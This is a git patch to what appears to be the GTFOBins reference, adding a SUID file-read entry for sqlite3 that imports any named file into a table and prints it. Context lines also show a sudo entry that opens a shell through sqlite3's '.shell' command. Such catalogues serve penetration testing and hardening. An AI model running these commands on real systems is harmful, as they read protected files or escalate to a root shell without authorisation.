From 28cc7ff7dabeed20f666f3d0eac4d9313df714c7 Mon Sep 17 00:00:00 2001 From: Shikata Date: Tue, 12 Jan 2021 13:57:34 +0200 Subject: [PATCH] Add SUID [file read] category to sqlite3 --- _gtfobins/sqlite3.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 12daa5b..95b0719 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -14,6 +14,14 @@ functions: .import $LFILE t SELECT * FROM t; EOF + suid: + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF sudo: - code: sudo sqlite3 /dev/null '.shell /bin/sh' limited-suid: